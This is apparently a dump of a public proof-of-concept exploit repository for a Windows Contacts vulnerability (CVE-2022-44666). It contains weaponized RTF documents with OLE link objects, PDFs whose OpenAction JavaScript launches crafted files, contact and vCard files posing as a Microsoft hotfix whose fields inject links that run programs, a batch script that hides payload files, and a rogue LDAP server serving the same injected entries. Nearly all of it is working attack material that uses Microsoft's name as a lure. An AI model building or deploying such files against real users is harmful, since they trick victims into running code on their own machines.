000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 687474703a2f2f3132372e302e302e313a383038312f706f632e68746d6c0000bbbbcccc200068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /further-pocs/MSWord/remote-weaponized-by-searchms/exploit.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/remote-weaponized-by-searchms/exploit.docx -------------------------------------------------------------------------------- /further-pocs/MSWord/remote-weaponized-by-searchms/exploit.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 687474703a2f2f3132372e302e302e313a383038312f706f632e68746d6c0000bbbbcccc200068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /further-pocs/MSWord/remote-weaponized-by-searchms/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 127 | 128 | -------------------------------------------------------------------------------- /further-pocs/MSWord/setup-hidden.bat: -------------------------------------------------------------------------------- 1 | attrib +s +h +r hidden\payload.bin 2 | attrib +s +h +r hidden\payload.exe 3 | attrib +s +h +r hidden\payload.lnk 4 | attrib +s +h +r hidden -------------------------------------------------------------------------------- /further-pocs/MSWord/url-protocol-ldap/exploit.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/url-protocol-ldap/exploit.docx -------------------------------------------------------------------------------- /further-pocs/MSWord/url-protocol-ldap/exploit.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 687474703a2f2f3132372e302e302e313a383038312f706f632e68746d6c0000bbbbcccc200068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /further-pocs/MSWord/url-protocol-ldap/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/poc/KB5014666-hotfix.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="notepad">Run-installer </a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | Microsoft KB5014666-hotfix 23 | Microsoft 24 | Microsoft 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="calc">Run-installer </a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">Run-installer </a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Microsoft Hotfix 66 | Microsoft Corporation 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/poc/KB5014666-hotfix.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:Microsoft 4 | FN:Microsoft 5 | NICKNAME: Microsoft KB5014666-hotfix 6 | ORG:Microsoft Corporation 7 | TITLE:Microsoft Hotfix 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">Run-installer 12 | URL;WORK:">Run-installer 13 | URL;TYPE=HOME:">Run-installer 14 | END:VCARD -------------------------------------------------------------------------------- /further-pocs/PDFreaders/poc/poc-contact.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.1 2 | 3 | 1 0 obj 4 | << 5 | /Type /Catalog 6 | /Outlines 2 0 R 7 | /Pages 3 0 R 8 | /OpenAction 7 0 R 9 | >> 10 | endobj 11 | 12 | 2 0 obj 13 | << 14 | /Type /Outlines 15 | /Count 0 16 | >> 17 | endobj 18 | 19 | 3 0 obj 20 | << 21 | /Type /Pages 22 | /Kids [4 0 R] 23 | /Count 1 24 | >> 25 | endobj 26 | 27 | 4 0 obj 28 | << 29 | /Type /Page 30 | /Parent 3 0 R 31 | /MediaBox [0 0 612 792] 32 | /Contents 5 0 R 33 | /Resources << 34 | /ProcSet [/PDF /Text] 35 | /Font << /F1 6 0 R >> 36 | >> 37 | >> 38 | endobj 39 | 40 | 5 0 obj 41 | << /Length 56 >> 42 | stream 43 | BT /F1 12 Tf 100 700 Td 15 TL (PDF JavaScript fuzzer) Tj ET 44 | endstream 45 | endobj 46 | 47 | 6 0 obj 48 | << 49 | /Type /Font 50 | /Subtype /Type1 51 | /Name /F1 52 | /BaseFont /Helvetica 53 | /Encoding /MacRomanEncoding 54 | >> 55 | endobj 56 | 57 | 7 0 obj 58 | << 59 | /Type /Action 60 | /S /JavaScript 61 | /JS ( 62 | app.launchURL("http://127.0.0.1:8081/KB5014666-hotfix.contact"); // For both Readers. 63 | ) 64 | >> 65 | endobj 66 | 67 | xref 68 | 0 8 69 | 0000000000 65535 f 70 | 0000000012 00000 n 71 | 0000000109 00000 n 72 | 0000000165 00000 n 73 | 0000000234 00000 n 74 | 0000000439 00000 n 75 | 0000000553 00000 n 76 | 0000000677 00000 n 77 | trailer 78 | << 79 | /Size 8 80 | /Root 1 0 R 81 | >> 82 | startxref 83 | 837 84 | %%EOF 85 | 86 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/poc/poc-vcf.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.1 2 | 3 | 1 0 obj 4 | << 5 | /Type /Catalog 6 | /Outlines 2 0 R 7 | /Pages 3 0 R 8 | /OpenAction 7 0 R 9 | >> 10 | endobj 11 | 12 | 2 0 obj 13 | << 14 | /Type /Outlines 15 | /Count 0 16 | >> 17 | endobj 18 | 19 | 3 0 obj 20 | << 21 | /Type /Pages 22 | /Kids [4 0 R] 23 | /Count 1 24 | >> 25 | endobj 26 | 27 | 4 0 obj 28 | << 29 | /Type /Page 30 | /Parent 3 0 R 31 | /MediaBox [0 0 612 792] 32 | /Contents 5 0 R 33 | /Resources << 34 | /ProcSet [/PDF /Text] 35 | /Font << /F1 6 0 R >> 36 | >> 37 | >> 38 | endobj 39 | 40 | 5 0 obj 41 | << /Length 56 >> 42 | stream 43 | BT /F1 12 Tf 100 700 Td 15 TL (PDF JavaScript fuzzer) Tj ET 44 | endstream 45 | endobj 46 | 47 | 6 0 obj 48 | << 49 | /Type /Font 50 | /Subtype /Type1 51 | /Name /F1 52 | /BaseFont /Helvetica 53 | /Encoding /MacRomanEncoding 54 | >> 55 | endobj 56 | 57 | 7 0 obj 58 | << 59 | /Type /Action 60 | /S /JavaScript 61 | /JS ( 62 | app.launchURL("http://127.0.0.1:8081/KB5014666-hotfix.vcf"); // For both Readers. 63 | ) 64 | >> 65 | endobj 66 | 67 | xref 68 | 0 8 69 | 0000000000 65535 f 70 | 0000000012 00000 n 71 | 0000000109 00000 n 72 | 0000000165 00000 n 73 | 0000000234 00000 n 74 | 0000000439 00000 n 75 | 0000000553 00000 n 76 | 0000000677 00000 n 77 | trailer 78 | << 79 | /Size 8 80 | /Root 1 0 R 81 | >> 82 | startxref 83 | 837 84 | %%EOF 85 | 86 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.1 2 | 3 | 1 0 obj 4 | << 5 | /Type /Catalog 6 | /Outlines 2 0 R 7 | /Pages 3 0 R 8 | /OpenAction 7 0 R 9 | >> 10 | endobj 11 | 12 | 2 0 obj 13 | << 14 | /Type /Outlines 15 | /Count 0 16 | >> 17 | endobj 18 | 19 | 3 0 obj 20 | << 21 | /Type /Pages 22 | /Kids [4 0 R] 23 | /Count 1 24 | >> 25 | endobj 26 | 27 | 4 0 obj 28 | << 29 | /Type /Page 30 | /Parent 3 0 R 31 | /MediaBox [0 0 612 792] 32 | /Contents 5 0 R 33 | /Resources << 34 | /ProcSet [/PDF /Text] 35 | /Font << /F1 6 0 R >> 36 | >> 37 | >> 38 | endobj 39 | 40 | 5 0 obj 41 | << /Length 56 >> 42 | stream 43 | BT /F1 12 Tf 100 700 Td 15 TL (PDF JavaScript fuzzer) Tj ET 44 | endstream 45 | endobj 46 | 47 | 6 0 obj 48 | << 49 | /Type /Font 50 | /Subtype /Type1 51 | /Name /F1 52 | /BaseFont /Helvetica 53 | /Encoding /MacRomanEncoding 54 | >> 55 | endobj 56 | 57 | 7 0 obj 58 | << 59 | /Type /Action 60 | /S /JavaScript 61 | /JS ( 62 | app.launchURL("http://127.0.0.1:8081/exploit.html"); // For both Readers. 63 | ) 64 | >> 65 | endobj 66 | 67 | xref 68 | 0 8 69 | 0000000000 65535 f 70 | 0000000012 00000 n 71 | 0000000109 00000 n 72 | 0000000165 00000 n 73 | 0000000234 00000 n 74 | 0000000439 00000 n 75 | 0000000553 00000 n 76 | 0000000677 00000 n 77 | trailer 78 | << 79 | /Size 8 80 | /Root 1 0 R 81 | >> 82 | startxref 83 | 837 84 | %%EOF 85 | 86 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/url-protocol-ldap/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/url-protocol-ldap/exploit.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.1 2 | 3 | 1 0 obj 4 | << 5 | /Type /Catalog 6 | /Outlines 2 0 R 7 | /Pages 3 0 R 8 | /OpenAction 7 0 R 9 | >> 10 | endobj 11 | 12 | 2 0 obj 13 | << 14 | /Type /Outlines 15 | /Count 0 16 | >> 17 | endobj 18 | 19 | 3 0 obj 20 | << 21 | /Type /Pages 22 | /Kids [4 0 R] 23 | /Count 1 24 | >> 25 | endobj 26 | 27 | 4 0 obj 28 | << 29 | /Type /Page 30 | /Parent 3 0 R 31 | /MediaBox [0 0 612 792] 32 | /Contents 5 0 R 33 | /Resources << 34 | /ProcSet [/PDF /Text] 35 | /Font << /F1 6 0 R >> 36 | >> 37 | >> 38 | endobj 39 | 40 | 5 0 obj 41 | << /Length 56 >> 42 | stream 43 | BT /F1 12 Tf 100 700 Td 15 TL (PDF JavaScript fuzzer) Tj ET 44 | endstream 45 | endobj 46 | 47 | 6 0 obj 48 | << 49 | /Type /Font 50 | /Subtype /Type1 51 | /Name /F1 52 | /BaseFont /Helvetica 53 | /Encoding /MacRomanEncoding 54 | >> 55 | endobj 56 | 57 | 7 0 obj 58 | << 59 | /Type /Action 60 | /S /JavaScript 61 | /JS ( 62 | //app.launchURL("ldap://127.0.0.1:389/cn=Microsoft,ou=people,dc=example,dc=org"); // For Foxit Reader. 63 | app.launchURL("http://127.0.0.1:8081/exploit.html"); // For both Readers. 64 | ) 65 | >> 66 | endobj 67 | 68 | xref 69 | 0 8 70 | 0000000000 65535 f 71 | 0000000012 00000 n 72 | 0000000109 00000 n 73 | 0000000165 00000 n 74 | 0000000234 00000 n 75 | 0000000439 00000 n 76 | 0000000553 00000 n 77 | 0000000677 00000 n 78 | trailer 79 | << 80 | /Size 8 81 | /Root 1 0 R 82 | >> 83 | startxref 84 | 837 85 | %%EOF 86 | 87 | -------------------------------------------------------------------------------- /further-pocs/browsers/poc/KB5014666-hotfix.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="notepad">Run-installer </a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | Microsoft KB5014666-hotfix 23 | Microsoft 24 | Microsoft 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="calc">Run-installer </a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">Run-installer </a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Microsoft Hotfix 66 | Microsoft Corporation 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /further-pocs/browsers/poc/KB5014666-hotfix.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:Microsoft 4 | FN:Microsoft 5 | NICKNAME: Microsoft KB5014666-hotfix 6 | ORG:Microsoft Corporation 7 | TITLE:Microsoft Hotfix 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">Run-installer 12 | URL;WORK:">Run-installer 13 | URL;TYPE=HOME:">Run-installer 14 | END:VCARD -------------------------------------------------------------------------------- /further-pocs/browsers/poc/poc-contact.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/browsers/poc/poc-vcf.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/browsers/remote-weaponized-by-searchms/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/browsers/url-protocol-ldap/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/ldap-rogue-server/ldap-server.py: -------------------------------------------------------------------------------- 1 | # LDAP Rogue Server. Sample taken from https://ldaptor.readthedocs.io/en/latest/quickstart.html#ldap-server-quick-start 2 | # Fully tested with Python 2.7. To run, install the package from pip: pip install ldaptor. 3 | # URL protocol example => ldap://127.0.0.1:389/cn=Microsoft,ou=people,dc=example,dc=org 4 | 5 | import sys 6 | import io 7 | 8 | from twisted.application import service 9 | from twisted.internet.endpoints import serverFromString 10 | from twisted.internet.protocol import ServerFactory 11 | from twisted.python.components import registerAdapter 12 | from twisted.python import log 13 | from ldaptor.inmemory import fromLDIFFile 14 | from ldaptor.interfaces import IConnectedLDAPEntry 15 | from ldaptor.protocols.ldap.ldapserver import LDAPServer 16 | 17 | LDIF = b"""\ 18 | dn: dc=org 19 | dc: org 20 | objectClass: dcObject 21 | 22 | dn: dc=example,dc=org 23 | dc: example 24 | objectClass: dcObject 25 | objectClass: organization 26 | 27 | dn: ou=people,dc=example,dc=org 28 | objectClass: organizationalUnit 29 | ou: people 30 | 31 | dn: cn=Microsoft,ou=people,dc=example,dc=org 32 | cn: Microsoft 33 | gn: Microsoft 34 | company: Microsoft 35 | title: Microsoft KB5001337-hotfix 36 | mail:">Run-installer 37 | url:">Run-installer 38 | wwwhomepage:">Run-installer 39 | objectclass: top 40 | objectclass: person 41 | objectClass: inetOrgPerson 42 | 43 | 